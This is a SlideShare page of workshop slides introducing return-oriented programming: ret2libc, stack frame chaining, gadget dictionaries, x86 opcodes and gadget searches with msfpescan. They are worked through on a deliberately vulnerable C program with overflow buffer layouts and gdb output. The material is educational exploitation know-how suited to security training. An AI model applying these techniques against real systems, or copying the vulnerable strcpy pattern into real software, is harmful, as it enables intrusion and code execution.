SlideShare a Scribd company logo

An introduction to ROP

Saumil Shah
Saumil Shah

Slides from my workshop at Hack.LU 2010 in Luxembourg. This workshop introduced the basic concepts of Return Oriented Programming with some hands-on exercises.

TechnologyEducation
1 of 55
net-square Introduction to ROP a first look at return oriented programming Saumil Shah, Net-Square Hack.LU 2010 - Luxembourg
net-square Introduction • DEP • EIP control • Ret2LibC • Return Oriented Programming
net-square DEP • Hardware enforced (NX). • Data areas marked non-executable. – Stack marked non-executable. – Heap marked non-executable. • You can load your shellcode in the stack or the heap... • ...but you can't jump to it.
net-square EIP control • Stack - forbidden • Heap - forbidden • Binary - OK • DLLs - OK Program Image Heap Stack DLL DLL DLL
net-square Ret2LibC • Return to LibC. • Pioneered by Solar Designer in 1997. • EIP made to "return to a function". • Need control of the stack memory. – We usually have it.
net-square Ret2LibC - how does it work? • Create a fake frame on the stack. • After an overflowed function returns... • ...set the EIP return address to the new function. • Append the fake frame. • New function executes. – parameters consumed from the fake frame. • system("/bin/sh")
net-square Return Oriented Programming • Series of function returns. • Chained frames. • Transform EIP based primitives into stubs that can be "returned into". • ESP is the new EIP!
net-square Topics • Function calls and returns • Stack overflows revisited • Creating stack frames • Chaining frames • ESP control
net-square Calling a function • Add two ints x, y. • add(3,4) • What does the calling frame look like? void add(int x, int y) { int sum; sum = x + y; printf("%dn", sum); } int main() { add(3, 4); }
net-square Stack frame for add(3,4) frame for add() return address from add() 3 4 call add
net-square Return from add(3,4) • add() is about to return. • RET after epilogue of add(). • Where does ESP point to? – immediately before the RET • What does the stack look like?
net-square Before the RET return address from add() 3 4 ESP
net-square Another function • Stack overflow in func1. • Can we call add(5, 6) after returning from func1? void func1(char *s) { char buffer[128]; strcpy(buffer, s); } int main() { func1(argv[1]); }
net-square Stack frame for func1() buffer return address from func1 s
net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA
net-square Before the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA ESP
net-square After the RET buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAA AAAA AAAA AAAA EIP = 0x41414141 ESP
net-square Return to add() • Insert a fake frame in the buffer. • Make func1() return to: add(01010101, 02020202) • What does the stack frame look like?
net-square strcpy(buffer, s) buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202
net-square Before func1() returns buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP
net-square Return to add() buffer return address from func1 s AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA address of add return address from add 01010101 02020202 ESP EIP = add()
net-square Return to add() • By carefully creating a frame... • ...we can make the program "return to our function". • We control the parameters. • We also control where to jump to after our function returns.
net-square victim2.c int main(int argc, char *argv[]) { add(3, 4); func1(argv[1]); } void func1(char *s) { char buffer[128]; strcpy(buffer, s); } void print_hello(void) { printf("Hello Worldn"); } void add(int x, int y) { int sum; sum = x + y; printf("%d + %d = %dn", x, y, sum); } stack overflow lurks here!
net-square victim2.c • Compile victim2.c • Run victim2 under a debugger • Study the stack frame before add(3, 4) gcc victim2.c -o victim2 gdb victim2
net-square gdb'ing add • Set a breakpoint before add(3, 4) 0x804836c <main>: push %ebp 0x804836d <main+1>: mov %esp,%ebp 0x804836f <main+3>: sub $0x8,%esp 0x8048372 <main+6>: and $0xfffffff0,%esp 0x8048375 <main+9>: mov $0x0,%eax 0x804837a <main+14>: sub %eax,%esp 0x804837c <main+16>: sub $0x8,%esp 0x804837f <main+19>: push $0x4 0x8048381 <main+21>: push $0x3 0x8048383 <main+23>: call 0x80483de <add> 0x8048388 <main+28>: add $0x10,%esp 0x804838b <main+31>: cmpl $0x1,0x8(%ebp)
net-square Stack frame before add(3, 4) • Dump the stack • Continue (gdb) x/64 $esp 0xbffff8ac: 0x08048388 0x00000003 0x00000004 0xbffff8c8 0xbffff8bc: 0x0804841c 0x40148f50 0x40012780 0xbffff8e8 0x08048388 3 4
net-square Overflowing func1() • Overflow func1 and... ...return to add(01010101, 02020202) • Create a fake frame. • Overwrite stack. • frame1.pl return from func1 param1 param2 return from add 0x080483de 0x01010101 0x02020202 0x42424242
net-square frame1.pl • Creates the overflow buffer as follows: • Set this in an environment variable EGG and run victim2 with $EGG: 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 distance to EIP address of add return from add param1 param2 export EGG=`./frame1.pl` gdb victim2 (gdb) run $EGG
net-square ESP • Where will ESP be after returning from add? • Verify 080483deAAAAAA...140...AAAAAA 42424242 01010101 02020202 (gdb) x/64 $esp 0xbffff824: 0x01010101 0x02020202 0x08048400 0x40148f50 0xbffff834: 0x40012780 0xbffff858 0x4002e7f7 0x00000002 ESP
net-square Chaining functions • After add(01010101, 02020202), we want to run add(03030303, 04040404). • How should we set up the frames? • First, study the frame after add() returns.
net-square After add() returns AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 ESP EIP = 42424242
net-square Where does the new frame go? AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA address of add 42424242 01010101 02020202 address of add ?? 03030303 04040404
net-square Where does the new frame go? • We get only ONE chance at strcpy. • How do we preserve params 01010101 and 02020202? • We can only APPEND the second frame below our first frame. • We have to UNWIND the first frame before returning to the second frame. • Return to epilogue!
net-square Chaining the frames AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 add(01010101, 02020202) add(03030303, 04040404)
net-square Keeping ESP in control AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA address of add address of POP/POP/RET 01010101 02020202 address of add 42424242 03030303 04040404 Return from func1 Return to add() Return to POP/POP/RET POP POP ESP RET - Return to add() Finally EIP = 0x42424242
net-square frame2.pl • Creates the overflow buffer as follows: 080483deAAAAAA...140...AAAAAA 0804843d 01010101 02020202 distance to EIP address of add POP/POP /RET param1 param2 080483de 42424242 03030303 04040404 address of add return from add param1 param2 Use msfelfscan to find the address of POP/POP/RET from victim2 binary.
net-square frame2.pl • Set this in an environment variable EGG and run victim2 with $EGG: export EGG=`./frame2.pl` gdb victim2 (gdb) run $EGG Starting program: /home/user0/victim2 $EGG 3 + 4 = 7 1010101 + 2020202 = 3030303 3030303 + 4040404 = 7070707 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? ()
net-square It's all about ESP! • ESP is the new EIP. • ROP involves keeping the ESP moving through the frames on the stack. • Frames can be chained by returning to epilogues of functions. – to appropriately unwind the parameters pushed on the stack. • We must never lose sight of RET.
net-square ROP frames - generic approach f1(A, B) f2(X) f1(C, D) f3(P, Q, R, S) f2(Y) : : & f1() & POP/POP/RET A B & f2() & POP/RET X & f3() & POPAD/RET P Q R & f1() & POP/POP/RET C D junk junk junk & f2() & POP/RET Y S
net-square Topics • Transforming classic EIP code to ROP • ROP vs. classic programming • Thinking in ROP terms • Assembling frames • Gadgets • Searching for gadgets • Generic techniques
net-square EIP vs. ESP Classic EIP code • N ops = N instructions. • EIP increments. • ESP fluctuates. • The CPU increments EIP automatically. ROP code • N ops = N frames. • ESP increments. • EIP fluctuates. • We have to control ESP through RET instructions.
net-square Transform EIP code to ROP • Load two registers • Call a function – with params 3,4 • How does this translate in ROP terms? mov eax, 14 mov ecx, 02500000 push 3 push 4 call 77fe3210
net-square Thinking in ROP terms ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 ESP Put 14 in the next stack word, and POP it into EAX. RET function body epilogue prologue vulnerable function EIP mov eax, 14 RET POP EAX POP EBX functionX 700344fe 700344fd 700344ff
net-square Thinking in ROP terms 700344fe AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14ESP RET function body epilogue prologue vulnerable function EIP Jump to address of "POP EAX; RET". Search function epilogues. RET POP EAX POP EBX functionX mov eax, 14
net-square Thinking in ROP terms 700344fe ?? AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ESP RET function body epilogue prologue vulnerable function EIP Place 02500000 as the next stack word, to be loaded into ECX. RET POP EAX POP EBX functionX eax = 00000014 mov ecx, 02500000
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 RET function body epilogue prologue vulnerable function We now need an address of a "POP ECX; RET" sequence. RET POP EAX POP EBX functionX RET POP ECX functionY ESP EIP eax = 00000014 mov ecx, 02500000 6d894430 6d894431
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000ESP RET function body epilogue prologue vulnerable function 02500000 is popped into ECX. RET POP EAX POP EBX functionX EIP RET POP ECX functionY eax = 00000014 mov ecx, 02500000
net-square Thinking in ROP terms 700344fe 6d894430 AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAA 14 02500000 ??ESP RET function body epilogue prologue vulnerable function We now need to call a function at 77fe3210, with parameters 3, 4 RET POP EAX POP EBX functionX EIP RET POP ECX functionY push 3; push 4; call 77fe3210 eax = 00000014 ecx = 02500000
net-square Gadget Dictionary POP EAX; RET Load value into register value POP ECX; RET Read memory at address address ADD EAX,n; RET Add MOV EAX,[ECX]; RET POP EAX; RET Write value at address address POP ECX; RET value MOV [EAX],ECX; RET INC EAX; RET Increment address of function Call a function param cleanup param 1 param 2 RET NOP param N POP; POP ... RET ADD ESP,24; RET POPAD; RET POP EAX; RET Call a function pointer address CALL [EAX]; RET XCHG EAX,ESP; RET Stack flip ESP=EAX LEAVE; RET Stack flip ESP=EBP POP ESP; RET Stack flip ESP=addr address
net-square Instruction Opcodes Instruction Opcodes RET C3 RET n C2 16bits POP EAX 58 POP ECX 59 MOV EAX,[ECX] 8B 01 MOV [EAX],ECX 89 08 MOV [ECX],EAX 89 01 INC EAX 40 ADD EAX, n 83 C0 8bits
net-square Instruction Opcodes Instruction Opcodes POP EBX/EDX/ESI/EDI/EBP 5B/5A/5E/5F/5D POPAD 61 ADD ESP,24 83 C4 18 CALL [EAX] FF 10 XCHG EAX,ESP 94 LEAVE C9 (mov esp,ebp; pop ebp) POP ESP 5C
net-square Searching for Gadgets • Use msfpescan's regex search. • Example: MOV EAX,[ECX]; RET msfpescan -D -r 'x8Bx01xC3' <file> msfpescan -D -r 'x8Bx01xC2.x00' <file> msfpescan -D -r 'x8Bx01.xC3' <file> msfpescan -D -r 'x8Bx01..xC3' <file> • Sometimes you may need to improvise.
net-square Generic Techniques • Run arbitrary shellcode. • Difficult to transform entire shellcode to ROP frames. • Create a ROP loader: – Allocate RWX memory – Copy classic shellcode to this memory – Jump to shellcode • Load and run any shellcode.
net-square DEMO TIME! • Java JNLP docbase overflow • Exploiting IE8 using ROP
net-square KTHXBAI! saumil@net-square.com linked-in: saumilshah no LOLcats were harmed in preparation of these slides

Recommended

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great Again
Saumil Shah
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3
Angel Boy
 
The Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageThe Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast Storage
Kernel TLV
 
Performance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux KernelPerformance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux Kernel
lcplcp1
 

Recommended

Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
 
Make ARM Shellcode Great Again
Make ARM Shellcode Great AgainMake ARM Shellcode Great Again
Make ARM Shellcode Great Again
Saumil Shah
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3
Angel Boy
 
The Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageThe Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast Storage
Kernel TLV
 
Performance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux KernelPerformance Analysis Tools for Linux Kernel
Performance Analysis Tools for Linux Kernel
lcplcp1
 
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
Brendan Gregg
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 National Cheng Kung University
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
FD.IO Vector Packet Processing
FD.IO Vector Packet ProcessingFD.IO Vector Packet Processing
FD.IO Vector Packet Processing
Kernel TLV
 
COSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem portingCOSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem porting
Eric Lin
 
DevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking WalkthroughDevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking Walkthrough
Thomas Graf
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
Angel Boy
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementation
Geoffroy Van Cutsem
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux Kernel
Divye Kapoor
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
SUSE Labs Taipei
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uring
ScyllaDB
 
SPI Drivers
SPI DriversSPI Drivers
SPI Drivers
SysPlay eLearning Academy for You
 
Linux SMEP bypass techniques
Linux SMEP bypass techniquesLinux SMEP bypass techniques
Linux SMEP bypass techniques
Vitaly Nikolenko
 
QEMU - Binary Translation
QEMU - Binary Translation QEMU - Binary Translation
QEMU - Binary Translation
Jiann-Fuh Liaw
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
Andriy Berestovskyy
 
Implementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over EthernetImplementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over Ethernet
James Wernicke
 
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
HungWei Chiu
 
Arm device tree and linux device drivers
Arm device tree and linux device driversArm device tree and linux device drivers
Arm device tree and linux device drivers
Houcheng Lin
 
VPP事始め
VPP事始めVPP事始め
VPP事始め
npsg
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Miguel Arroyo
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 

More Related Content

What's hot

VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
Brendan Gregg
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
FD.IO Vector Packet Processing
FD.IO Vector Packet ProcessingFD.IO Vector Packet Processing
FD.IO Vector Packet Processing
Kernel TLV
 
COSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem portingCOSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem porting
Eric Lin
 
DevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking WalkthroughDevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking Walkthrough
Thomas Graf
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
Angel Boy
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementation
Geoffroy Van Cutsem
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux Kernel
Divye Kapoor
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
SUSE Labs Taipei
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uring
ScyllaDB
 
SPI Drivers
SPI DriversSPI Drivers
SPI Drivers
SysPlay eLearning Academy for You
 
Linux SMEP bypass techniques
Linux SMEP bypass techniquesLinux SMEP bypass techniques
Linux SMEP bypass techniques
Vitaly Nikolenko
 
QEMU - Binary Translation
QEMU - Binary Translation QEMU - Binary Translation
QEMU - Binary Translation
Jiann-Fuh Liaw
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
Andriy Berestovskyy
 
Implementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over EthernetImplementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over Ethernet
James Wernicke
 
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
HungWei Chiu
 
Arm device tree and linux device drivers
Arm device tree and linux device driversArm device tree and linux device drivers
Arm device tree and linux device drivers
Houcheng Lin
 
VPP事始め
VPP事始めVPP事始め
VPP事始め
npsg
 

What's hot (20)

VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
FD.IO Vector Packet Processing
FD.IO Vector Packet ProcessingFD.IO Vector Packet Processing
FD.IO Vector Packet Processing
 
COSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem portingCOSCUP 2020 RISC-V 32 bit linux highmem porting
COSCUP 2020 RISC-V 32 bit linux highmem porting
 
DevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking WalkthroughDevConf 2014 Kernel Networking Walkthrough
DevConf 2014 Kernel Networking Walkthrough
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
 
Project ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementationProject ACRN: SR-IOV implementation
Project ACRN: SR-IOV implementation
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux Kernel
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
High-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uringHigh-Performance Networking Using eBPF, XDP, and io_uring
High-Performance Networking Using eBPF, XDP, and io_uring
 
SPI Drivers
SPI DriversSPI Drivers
SPI Drivers
 
Linux SMEP bypass techniques
Linux SMEP bypass techniquesLinux SMEP bypass techniques
Linux SMEP bypass techniques
 
QEMU - Binary Translation
QEMU - Binary Translation QEMU - Binary Translation
QEMU - Binary Translation
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
 
Implementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over EthernetImplementation &amp; Comparison Of Rdma Over Ethernet
Implementation &amp; Comparison Of Rdma Over Ethernet
 
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
以 eBPF 構建一個更為堅韌的 Kubernetes 叢集
 
Arm device tree and linux device drivers
Arm device tree and linux device driversArm device tree and linux device drivers
Arm device tree and linux device drivers
 
VPP事始め
VPP事始めVPP事始め
VPP事始め
 

Similar to An introduction to ROP

Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Miguel Arroyo
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
Sam Bowne
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
Sam Bowne
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
Quinn Wilton
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Japneet Singh
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdk
markdgray
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
netLec2.pdf
netLec2.pdfnetLec2.pdf
netLec2.pdf
MuthuramanElangovan
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimonSisimon Soman
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdf
hasan58964
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
FPGA_Logic.pdf
FPGA_Logic.pdfFPGA_Logic.pdf
FPGA_Logic.pdf
wafawafa52
 
Load-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOADLoad-time Hacking using LD_PRELOAD
Load-time Hacking using LD_PRELOAD
Dharmalingam Ganesan
 
System design using HDL - Module 3
System design using HDL - Module 3System design using HDL - Module 3
System design using HDL - Module 3
Aravinda Koithyar
 

Similar to An introduction to ROP (20)

Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdk
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
netLec2.pdf
netLec2.pdfnetLec2.pdf
netLec2.pdf
 
Windows debugging sisimon
Windows debugging sisimonWindows debugging sisimon
Windows debugging sisimon
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdf
 
test
testtest
test
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
